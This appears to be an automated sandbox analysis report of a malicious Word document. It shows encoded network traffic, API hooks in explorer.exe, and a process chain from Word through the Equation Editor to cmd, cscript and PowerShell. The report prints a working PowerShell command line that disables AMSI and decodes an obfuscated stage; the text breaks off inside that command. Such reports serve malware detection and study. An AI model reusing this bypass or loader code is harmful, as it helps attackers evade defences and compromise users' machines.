2021-12-02 17:26:37 UTC	1671	IN	Data Raw: 41 34 4e 43 78 67 52 44 67 73 59 45 51 77 4c 47 42 47 4e 69 78 67 4d 30 45 73 59 45 4d 79 4c 47 41 30 4d 53 78 67 51 55 4d 73 59 44 46 45 4c 47 41 78 4d 43 78 67 4f 44 41 73 59 44 4d 30 4c 47 41 30 4f 43 78 67 4d 6a 6b 73 59 45 55 33 4c 47 41 35 4d 69 78 67 52 6b 49 73 59 45 55 30 4c 47 42 45 52 69 78 67 4e 6b 51 73 59 44 6b 31 4c 47 42 46 4e 69 78 67 52 55 49 73 59 44 59 30 4c 47 41 32 4d 53 78 67 4f 45 45 73 59 45 45 31 4c 47 42 43 51 69 78 67 4e 45 45 73 59 44 59 30 4c 47 42 45 4d 79 78 67 51 54 59 73 59 45 4e 45 4c 47 42 44 4d 43 78 67 4e 55 4d 73 59 44 6b 35 4c 47 41 33 4f 43 78 67 4e 54 55 73 59 44 51 30 4c 47 41 77 4e 69 78 67 4d 7a 6b 73 59 45 46 43 4c 47 42 42 51 69 78 67 52 44 49 73 59 44 41 77 4c 47 42 47 51 79 78 67 4f 45 59 73 59 44 4a 45 4c Data Ascii: A4NCxgRDgsYEQwLGBGNixgM0EsYEMyLGA0MSxgQUMsYDFELGAxMCxgODAsYDM0LGA0OCxgMjksYEU3LGA5MixgRkIsYEU0LGBERixgNkQsYDk1LGBFNixgRUIsYDY0LGA2MSxgOEEsYEE1LGBCQixgNEEsYDY0LGBEMyxgQTYsYENELGBDMCxgNUMsYDk5LGA3OCxgNTUsYDQ0LGAwNixgMzksYEFCLGBBQixgRDIsYDAwLGBGQyxgOEYsYDJEL
2021-12-02 17:26:37 UTC	1687	IN	Data Raw: 41 33 4f 43 78 67 51 54 4d 73 59 44 63 32 4c 47 41 32 4f 53 78 67 51 6b 55 73 59 44 49 30 4c 47 41 7a 52 43 78 67 4e 54 63 73 59 44 51 77 4c 47 41 33 51 53 78 67 4d 55 4d 73 59 45 4d 33 4c 47 41 77 4e 79 78 67 51 7a 4d 73 59 44 42 47 4c 47 42 46 52 69 78 67 4d 54 59 73 59 44 68 42 4c 47 41 33 4f 43 78 67 51 6a 55 73 59 44 6b 31 4c 47 41 78 52 43 78 67 4d 30 55 73 59 45 49 31 4c 47 41 79 51 69 78 67 4d 30 45 73 59 45 4d 34 4c 47 41 77 51 79 78 67 4d 45 55 73 59 44 45 79 4c 47 41 77 4d 43 78 67 4f 45 51 73 59 44 41 31 4c 47 41 33 51 53 78 67 4f 55 55 73 59 45 49 79 4c 47 41 35 52 69 78 67 4d 44 67 73 59 45 46 42 4c 47 41 35 4f 53 78 67 4d 6b 4d 73 59 45 4d 33 4c 47 42 43 51 69 78 67 4d 44 59 73 59 44 52 43 4c 47 41 35 4e 79 78 67 4e 54 6b 73 59 45 49 77 4c Data Ascii: A3OCxgQTMsYDc2LGA2OSxgQkUsYDI0LGAzRCxgNTcsYDQwLGA3QSxgMUMsYEM3LGAwNyxgQzMsYDBGLGBFRixgMTYsYDhBLGA3OCxgQjUsYDk1LGAxRCxgM0UsYEI1LGAyQixgM0EsYEM4LGAwQyxgMEUsYDEyLGAwMCxgOEQsYDA1LGA3QSxgOUUsYEIyLGA5RixgMDgsYEFBLGA5OSxgMkMsYEM3LGBCQixgMDYsYDRCLGA5NyxgNTksYEIwL
2021-12-02 17:26:37 UTC	1703	IN	Data Raw: 42 46 4e 53 78 67 4d 45 4d 73 59 45 45 34 4c 47 41 32 51 53 78 67 4e 6a 51 73 59 45 51 31 4c 47 41 7a 4d 79 78 67 51 6b 55 73 59 44 59 31 4c 47 41 79 4d 43 78 67 4d 6a 6b 73 59 45 4d 77 4c 47 42 44 51 79 78 67 52 45 55 73 59 45 46 45 4c 47 41 35 51 69 78 67 4e 45 51 73 59 45 4d 77 4c 47 42 45 4d 53 78 67 51 7a 49 73 59 45 52 43 4c 47 41 32 52 43 78 67 51 54 63 73 59 45 51 79 4c 47 42 45 4e 69 78 67 4f 45 4d 73 59 45 55 78 4c 47 41 31 51 69 78 67 4d 44 6b 73 59 45 59 33 4c 47 41 32 4f 43 78 67 4d 55 59 73 59 44 6b 35 4c 47 41 7a 4d 53 78 67 52 6b 55 73 59 44 41 79 4c 47 41 33 4e 69 78 67 4e 44 63 73 59 44 63 35 4c 47 41 30 52 53 78 67 4d 6b 4d 73 59 44 4e 45 4c 47 42 47 4d 79 78 67 51 30 4d 73 59 44 56 45 4c 47 42 46 4d 79 78 67 51 55 49 73 59 45 4a 42 4c Data Ascii: BFNSxgMEMsYEE4LGA2QSxgNjQsYEQ1LGAzMyxgQkUsYDY1LGAyMCxgMjksYEMwLGBDQyxgREUsYEFELGA5QixgNEQsYEMwLGBEMSxgQzIsYERCLGA2RCxgQTcsYEQyLGBENixgOEMsYEUxLGA1QixgMDksYEY3LGA2OCxgMUYsYDk5LGAzMSxgRkUsYDAyLGA3NixgNDcsYDc5LGA0RSxgMkMsYDNELGBGMyxgQ0MsYDVELGBFMyxgQUIsYEJBL
2021-12-02 17:26:37 UTC	1719	IN	Data Raw: 41 35 4d 43 78 67 52 55 4d 73 59 44 45 34 4c 47 42 45 52 69 78 67 52 54 4d 73 59 44 4d 32 4c 47 41 77 4d 53 78 67 4d 54 67 73 59 45 4a 42 4c 47 42 47 4d 79 78 67 52 45 45 73 59 44 49 7a 4c 47 42 44 4d 43 78 67 4e 54 45 73 59 44 55 32 4c 47 42 46 4e 53 78 67 4d 30 49 73 59 44 6b 34 4c 47 41 7a 51 79 78 67 51 7a 6b 73 59 44 6b 79 4c 47 41 32 51 79 78 67 4d 6b 49 73 59 44 63 79 4c 47 42 42 4e 43 78 67 4e 55 55 73 59 45 56 45 4c 47 41 7a 4d 79 78 67 4d 54 41 73 59 45 51 79 4c 47 41 33 4d 69 78 67 52 44 55 73 59 45 51 35 4c 47 41 7a 4e 53 78 67 4e 54 63 73 59 45 5a 43 4c 47 41 34 51 69 78 67 52 6b 45 73 59 44 4d 78 4c 47 42 46 4f 53 78 67 4e 7a 67 73 59 45 45 35 4c 47 41 31 4e 79 78 67 4e 7a 4d 73 59 44 6b 30 4c 47 42 47 4e 43 78 67 52 55 59 73 59 45 45 34 4c Data Ascii: A5MCxgRUMsYDE4LGBERixgRTMsYDM2LGAwMSxgMTgsYEJBLGBGMyxgREEsYDIzLGBDMCxgNTEsYDU2LGBFNSxgM0IsYDk4LGAzQyxgQzksYDkyLGA2QyxgMkIsYDcyLGBBNCxgNUUsYEVELGAzMyxgMTAsYEQyLGA3MixgRDUsYEQ5LGAzNSxgNTcsYEZCLGA4QixgRkEsYDMxLGBFOSxgNzgsYEE5LGA1NyxgNzMsYDk0LGBGNCxgRUYsYEE4L
2021-12-02 17:26:37 UTC	1735	IN	Data Raw: 42 47 4f 43 78 67 4d 44 51 73 59 45 45 78 4c 47 42 44 4f 43 78 67 4e 30 4d 73 59 44 6b 33 4c 47 41 78 4f 53 78 67 4f 54 59 73 59 44 45 78 4c 47 41 77 52 53 78 67 4d 54 67 73 59 44 55 32 4c 47 41 79 51 69 78 67 4e 54 67 73 59 45 56 47 4c 47 41 30 51 69 78 67 4f 55 51 73 59 45 5a 44 4c 47 41 35 52 43 78 67 52 6b 4d 73 59 45 55 32 4c 47 41 30 4d 53 78 67 52 55 45 73 59 44 45 79 4c 47 41 77 52 69 78 67 4e 55 4d 73 59 44 45 7a 4c 47 41 35 51 53 78 67 52 54 63 73 59 44 45 77 4c 47 41 35 4e 43 78 67 4d 44 59 73 59 45 45 31 4c 47 42 46 4e 79 78 67 4f 44 63 73 59 44 5a 43 4c 47 41 33 4e 79 78 67 52 6a 6b 73 59 45 56 44 4c 47 41 77 4e 43 78 67 4d 30 55 73 59 45 55 32 4c 47 41 78 52 53 78 67 4f 54 41 73 59 44 49 34 4c 47 41 77 52 43 78 67 4f 55 45 73 59 44 4d 7a 4c Data Ascii: BGOCxgMDQsYEExLGBDOCxgN0MsYDk3LGAxOSxgOTYsYDExLGAwRSxgMTgsYDU2LGAyQixgNTgsYEVGLGA0QixgOUQsYEZDLGA5RCxgRkMsYEU2LGA0MSxgRUEsYDEyLGAwRixgNUMsYDEzLGA5QSxgRTcsYDEwLGA5NCxgMDYsYEE1LGBFNyxgODcsYDZCLGA3NyxgRjksYEVDLGAwNCxgM0UsYEU2LGAxRSxgOTAsYDI4LGAwRCxgOUEsYDMzL
2021-12-02 17:26:37 UTC	1751	IN	Data Raw: 41 33 4d 53 78 67 51 6a 55 73 59 44 5a 45 4c 47 42 46 52 53 78 67 52 44 59 73 59 44 49 79 4c 47 41 33 52 53 78 67 4d 30 4d 73 59 44 45 77 4c 47 42 46 4e 79 78 67 4e 6a 45 73 59 44 51 79 4c 47 41 30 4e 53 78 67 4e 7a 45 73 59 44 45 32 4c 47 42 46 51 53 78 67 4e 54 45 73 59 44 55 32 4c 47 41 7a 52 43 78 67 4e 30 49 73 59 44 49 31 4c 47 42 47 52 69 78 67 51 6b 49 73 59 45 51 32 4c 47 42 43 4d 79 78 67 4f 44 55 73 59 45 45 7a 4c 47 41 77 51 69 78 67 4e 54 63 73 59 44 63 32 4c 47 41 33 52 43 78 67 4e 44 6b 73 59 45 5a 46 4c 47 42 44 4d 53 78 67 4d 7a 6b 73 59 44 46 44 4c 47 41 77 52 53 78 67 4e 54 6b 73 59 44 41 7a 4c 47 41 33 52 43 78 67 51 7a 45 73 59 45 5a 42 4c 47 42 47 4e 79 78 67 4e 7a 67 73 59 45 51 77 4c 47 42 47 51 53 78 67 52 6a 6b 73 59 45 49 35 4c Data Ascii: A3MSxgQjUsYDZELGBFRSxgRDYsYDIyLGA3RSxgM0MsYDEwLGBFNyxgNjEsYDQyLGA0NSxgNzEsYDE2LGBFQSxgNTEsYDU2LGAzRCxgN0IsYDI1LGBGRixgQkIsYEQ2LGBCMyxgODUsYEEzLGAwQixgNTcsYDc2LGA3RCxgNDksYEZFLGBDMSxgMzksYDFDLGAwRSxgNTksYDAzLGA3RCxgQzEsYEZBLGBGNyxgNzgsYEQwLGBGQSxgRjksYEI5L
2021-12-02 17:26:37 UTC	1767	IN	Data Raw: 42 44 52 53 78 67 4e 54 67 73 59 45 56 43 4c 47 41 31 52 53 78 67 4e 44 55 73 59 44 45 7a 4c 47 41 32 51 53 78 67 4e 54 63 73 59 44 63 78 4c 47 41 79 4d 79 78 67 52 55 55 73 59 45 55 78 4c 47 41 79 4d 79 78 67 4e 54 4d 73 59 45 59 32 4c 47 41 30 52 43 78 67 52 6a 41 73 59 44 55 31 4c 47 42 43 4d 69 78 67 51 6a 63 73 59 45 59 79 4c 47 41 79 4d 53 78 67 51 7a 45 73 59 45 4e 47 4c 47 41 7a 52 53 78 67 52 54 49 73 59 45 59 35 4c 47 41 79 4d 43 78 67 52 45 45 73 59 45 4e 46 4c 47 42 43 4e 43 78 67 4e 44 59 73 59 45 52 45 4c 47 41 79 52 53 78 67 52 6a 6b 73 59 45 49 35 4c 47 41 78 4e 53 78 67 4f 54 4d 73 59 44 55 34 4c 47 41 78 4e 79 78 67 4e 55 59 73 59 44 59 35 4c 47 41 34 52 53 78 67 4d 6b 49 73 59 44 67 33 4c 47 42 42 4f 43 78 67 4f 44 59 73 59 45 4d 33 4c Data Ascii: BDRSxgNTgsYEVCLGA1RSxgNDUsYDEzLGA2QSxgNTcsYDcxLGAyMyxgRUUsYEUxLGAyMyxgNTMsYEY2LGA0RCxgRjAsYDU1LGBCMixgQjcsYEYyLGAyMSxgQzEsYENGLGAzRSxgRTIsYEY5LGAyMCxgREEsYENFLGBCNCxgNDYsYERELGAyRSxgRjksYEI5LGAxNSxgOTMsYDU4LGAxNyxgNUYsYDY5LGA4RSxgMkIsYDg3LGBBOCxgODYsYEM3L
2021-12-02 17:26:37 UTC	1783	IN	Data Raw: 42 46 51 69 78 67 52 44 59 73 59 44 55 78 4c 47 42 43 4f 53 78 67 52 44 6b 73 59 44 51 34 4c 47 42 45 52 53 78 67 4f 44 6b 73 59 44 67 7a 4c 47 41 30 51 79 78 67 51 6b 45 73 59 45 45 32 4c 47 41 78 51 79 78 67 4e 55 51 73 59 44 6b 7a 4c 47 42 43 52 43 78 67 4e 54 55 73 59 45 55 79 4c 47 41 7a 51 79 78 67 4f 44 59 73 59 44 4d 32 4c 47 41 78 4e 79 78 67 4e 55 4d 73 59 45 56 44 4c 47 42 47 4f 53 78 67 4e 45 51 73 59 45 51 78 4c 47 41 30 4f 53 78 67 51 55 4d 73 59 44 4d 33 4c 47 41 33 4e 69 78 67 4e 54 63 73 59 44 63 32 4c 47 41 30 4d 53 78 67 4d 54 6b 73 59 44 6c 42 4c 47 41 35 52 43 78 67 4d 44 63 73 59 45 55 33 4c 47 41 30 52 53 78 67 52 54 67 73 59 45 55 31 4c 47 41 31 4e 43 78 67 4d 44 67 73 59 45 51 77 4c 47 41 31 4f 43 78 67 4d 45 4d 73 59 44 67 35 4c Data Ascii: BFQixgRDYsYDUxLGBCOSxgRDksYDQ4LGBERSxgODksYDgzLGA0QyxgQkEsYEE2LGAxQyxgNUQsYDkzLGBCRCxgNTUsYEUyLGAzQyxgODYsYDM2LGAxNyxgNUMsYEVDLGBGOSxgNEQsYEQxLGA0OSxgQUMsYDM3LGA3NixgNTcsYDc2LGA0MSxgMTksYDlBLGA5RCxgMDcsYEU3LGA0RSxgRTgsYEU1LGA1NCxgMDgsYEQwLGA1OCxgMEMsYDg5L
2021-12-02 17:26:37 UTC	1799	IN	Data Raw: 41 77 52 43 78 67 4e 54 51 73 59 45 5a 46 4c 47 42 45 4e 69 78 67 4e 45 51 73 59 44 52 45 4c 47 42 44 4e 53 78 67 52 55 59 73 59 44 45 79 4c 47 41 77 4d 69 78 67 4e 7a 6b 73 59 45 59 78 4c 47 41 34 4d 43 78 67 4e 55 45 73 59 44 55 77 4c 47 42 43 4e 53 78 67 51 30 49 73 59 44 41 78 4c 47 42 45 4e 69 78 67 51 54 59 73 59 45 51 78 4c 47 42 42 52 69 78 67 52 6a 6b 73 59 45 55 35 4c 47 41 30 4d 69 78 67 52 55 49 73 59 44 6b 78 4c 47 41 33 4d 53 78 67 4e 30 51 73 59 44 46 44 4c 47 41 79 51 69 78 67 4f 45 49 73 59 44 59 77 4c 47 41 77 51 69 78 67 4e 30 59 73 59 45 51 77 4c 47 42 45 51 53 78 67 4e 7a 4d 73 59 44 59 78 4c 47 42 42 4d 53 78 67 4e 30 4d 73 59 45 5a 47 4c 47 41 30 4d 43 78 67 4e 55 49 73 59 44 51 31 4c 47 41 79 52 69 78 67 52 45 49 73 59 44 63 31 4c Data Ascii: AwRCxgNTQsYEZFLGBENixgNEQsYDRELGBDNSxgRUYsYDEyLGAwMixgNzksYEYxLGA4MCxgNUEsYDUwLGBCNSxgQ0IsYDAxLGBENixgQTYsYEQxLGBBRixgRjksYEU5LGA0MixgRUIsYDkxLGA3MSxgN0QsYDFDLGAyQixgOEIsYDYwLGAwQixgN0YsYEQwLGBEQSxgNzMsYDYxLGBBMSxgN0MsYEZGLGA0MCxgNUIsYDQ1LGAyRixgREIsYDc1L
2021-12-02 17:26:37 UTC	1815	IN	Data Raw: 42 44 4f 53 78 67 4f 55 59 73 59 45 45 32 4c 47 41 7a 4e 43 78 67 4d 6a 67 73 59 45 55 33 4c 47 42 42 52 69 78 67 52 6b 51 73 59 45 59 35 4c 47 42 45 4e 43 78 67 52 54 55 73 59 45 49 77 4c 47 41 35 4d 43 78 67 4e 45 45 73 59 45 55 33 4c 47 42 46 52 69 78 67 4d 44 6b 73 59 44 49 31 4c 47 41 34 4f 53 78 67 52 44 59 73 59 44 67 78 4c 47 42 47 4e 43 78 67 4f 54 49 73 59 44 42 42 4c 47 41 77 4d 43 78 67 4e 6a 51 73 59 45 55 31 4c 47 41 77 51 53 78 67 52 44 63 73 59 44 6b 79 4c 47 42 44 4e 69 78 67 4e 44 4d 73 59 44 52 42 4c 47 42 42 4d 43 78 67 4d 44 4d 73 59 44 64 44 4c 47 42 44 4e 53 78 67 4e 7a 4d 73 59 44 6b 30 4c 47 41 31 4d 79 78 67 4d 54 4d 73 59 45 49 33 4c 47 41 78 51 69 78 67 4d 6a 6b 73 59 44 52 44 4c 47 42 44 4e 69 78 67 4e 54 41 73 59 44 59 31 4c Data Ascii: BDOSxgOUYsYEE2LGAzNCxgMjgsYEU3LGBBRixgRkQsYEY5LGBENCxgRTUsYEIwLGA5MCxgNEEsYEU3LGBFRixgMDksYDI1LGA4OSxgRDYsYDgxLGBGNCxgOTIsYDBBLGAwMCxgNjQsYEU1LGAwQSxgRDcsYDkyLGBDNixgNDMsYDRBLGBBMCxgMDMsYDdDLGBDNSxgNzMsYDk0LGA1MyxgMTMsYEI3LGAxQixgMjksYDRDLGBDNixgNTAsYDY1L
2021-12-02 17:26:37 UTC	1831	IN	Data Raw: 41 34 51 69 78 67 4d 45 49 73 59 44 5a 46 4c 47 42 43 52 43 78 67 52 54 51 73 59 44 4e 42 4c 47 41 77 51 69 78 67 4d 45 4d 73 59 45 45 33 4c 47 41 32 4d 53 78 67 4f 45 51 73 59 44 4d 34 4c 47 42 43 4d 43 78 67 4e 44 6b 73 59 44 67 32 4c 47 41 35 4d 69 78 67 52 6a 59 73 59 44 67 77 4c 47 41 33 4e 43 78 67 4e 6b 49 73 59 45 45 78 4c 47 41 78 52 69 78 67 4d 6a 45 73 59 44 42 45 4c 47 41 78 52 43 78 67 4e 6a 6b 73 59 44 56 44 4c 47 41 35 51 69 78 67 4e 6b 59 73 59 44 41 77 4c 47 41 32 4e 69 78 67 4f 55 51 73 59 44 55 32 4c 47 41 34 4d 53 78 67 51 7a 55 73 59 45 52 45 4c 47 41 7a 4d 53 78 67 4d 55 51 73 59 45 51 31 4c 47 42 43 4f 43 78 67 4e 6a 49 73 59 44 68 44 4c 47 41 79 52 69 78 67 52 6a 6b 73 59 44 42 43 4c 47 41 31 52 53 78 67 4e 44 63 73 59 45 45 7a 4c Data Ascii: A4QixgMEIsYDZFLGBCRCxgRTQsYDNBLGAwQixgMEMsYEE3LGA2MSxgOEQsYDM4LGBCMCxgNDksYDg2LGA5MixgRjYsYDgwLGA3NCxgNkIsYEExLGAxRixgMjEsYDBELGAxRCxgNjksYDVDLGA5QixgNkYsYDAwLGA2NixgOUQsYDU2LGA4MSxgQzUsYERELGAzMSxgMUQsYEQ1LGBCOCxgNjIsYDhDLGAyRixgRjksYDBCLGA1RSxgNDcsYEEzL
2021-12-02 17:26:37 UTC	1847	IN	Data Raw: 41 32 52 53 78 67 4d 7a 6b 73 59 44 41 32 4c 47 41 77 51 79 78 67 4d 44 4d 73 59 44 4a 42 4c 47 41 7a 4d 53 78 67 4e 55 4d 73 59 44 6b 79 4c 47 42 44 4f 43 78 67 4e 45 59 73 59 44 6c 42 4c 47 41 35 4e 79 78 67 52 6b 49 73 59 45 55 78 4c 47 42 44 4f 43 78 67 52 44 51 73 59 44 4e 42 4c 47 41 78 52 43 78 67 4e 54 55 73 59 44 68 44 4c 47 41 30 4d 53 78 67 4f 54 49 73 59 44 51 7a 4c 47 41 79 52 69 78 67 51 7a 59 73 59 44 45 31 4c 47 41 34 4e 79 78 67 52 55 49 73 59 45 5a 46 4c 47 42 42 4e 79 78 67 51 6a 67 73 59 44 4a 47 4c 47 41 30 4d 79 78 67 4f 54 6b 73 59 44 4d 33 4c 47 41 79 4e 53 78 67 4e 6a 55 73 59 45 59 33 4c 47 41 35 4d 69 78 67 52 44 67 73 59 45 4e 45 4c 47 41 7a 52 53 78 67 52 55 55 73 59 44 63 33 4c 47 41 34 4e 79 78 67 4f 54 63 73 59 45 51 77 4c Data Ascii: A2RSxgMzksYDA2LGAwQyxgMDMsYDJBLGAzMSxgNUMsYDkyLGBDOCxgNEYsYDlBLGA5NyxgRkIsYEUxLGBDOCxgRDQsYDNBLGAxRCxgNTUsYDhDLGA0MSxgOTIsYDQzLGAyRixgQzYsYDE1LGA4NyxgRUIsYEZFLGBBNyxgQjgsYDJGLGA0MyxgOTksYDM3LGAyNSxgNjUsYEY3LGA5MixgRDgsYENELGAzRSxgRUUsYDc3LGA4NyxgOTcsYEQwL
2021-12-02 17:26:37 UTC	1863	IN	Data Raw: 41 79 52 69 78 67 51 54 51 73 59 44 45 31 4c 47 41 31 4e 43 78 67 4d 7a 49 73 59 44 6b 31 4c 47 42 46 51 79 78 67 52 6a 41 73 59 44 46 42 4c 47 42 44 51 79 78 67 51 6a 67 73 59 45 5a 43 4c 47 42 43 4d 79 78 67 4e 6a 63 73 59 44 67 78 4c 47 41 7a 52 69 78 67 52 44 55 73 59 44 6b 30 4c 47 42 44 4f 53 78 67 4d 6a 67 73 59 44 56 43 4c 47 41 78 4d 43 78 67 4d 7a 49 73 59 45 51 33 4c 47 42 47 4d 43 78 67 4e 30 51 73 59 44 41 33 4c 47 41 35 4e 43 78 67 52 6b 55 73 59 45 49 7a 4c 47 42 44 4e 43 78 67 52 6b 55 73 59 44 67 7a 4c 47 42 45 51 69 78 67 4d 54 63 73 59 44 55 34 4c 47 42 47 4f 53 78 67 52 6b 4d 73 59 44 6c 47 4c 47 42 46 4f 53 78 67 4d 54 45 73 59 45 45 78 4c 47 41 33 4d 43 78 67 4f 55 45 73 59 45 4d 31 4c 47 41 32 4d 43 78 67 4d 44 45 73 59 45 51 33 4c Data Ascii: AyRixgQTQsYDE1LGA1NCxgMzIsYDk1LGBFQyxgRjAsYDFBLGBDQyxgQjgsYEZCLGBCMyxgNjcsYDgxLGAzRixgRDUsYDk0LGBDOSxgMjgsYDVCLGAxMCxgMzIsYEQ3LGBGMCxgN0QsYDA3LGA5NCxgRkUsYEIzLGBDNCxgRkUsYDgzLGBEQixgMTcsYDU4LGBGOSxgRkMsYDlGLGBFOSxgMTEsYEExLGA3MCxgOUEsYEM1LGA2MCxgMDEsYEQ3L
2021-12-02 17:26:37 UTC	1875	IN	Data Raw: 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c Data Ascii: AwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwL

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: USER32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x85 0x5E 0xEB
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x8D 0xDE 0xEB
GetMessageW	INLINE	0x48 0x8B 0xB8 0x8D 0xDE 0xEB
GetMessageA	INLINE	0x48 0x8B 0xB8 0x85 0x5E 0xEB

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 2704 Parent PID: 596

General

Start time:	18:25:17
Start date:	02/12/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13f800000
File size:	1423704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: EQNEDT32.EXE PID: 668 Parent PID: 596

General

Start time:	18:25:19
Start date:	02/12/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.exe PID: 2996 Parent PID: 668

General

Start time:	18:25:20
Start date:	02/12/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	CmD.exe /C cscript %tmp%\Client.vbs A C
Imagebase:	0x4a470000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cscript.exe PID: 2700 Parent PID: 2996

General

Start time:	18:25:21
Start date:	02/12/2021
Path:	C:\Windows\SysWOW64\cscript.exe
Wow64 process (32bit):	true
Commandline:	cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C
Imagebase:	0x460000
File size:	126976 bytes
MD5 hash:	A3A35EE79C64A640152B3113E6E254E2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: powershell.exe PID: 1344 Parent PID: 1304

General

Start time:	18:25:22
Start date:	02/12/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	Powershell $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like 'iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like 'Context') {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1);$91534784575270519153478457527051915347845752705191534784575270519153478457527051=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,8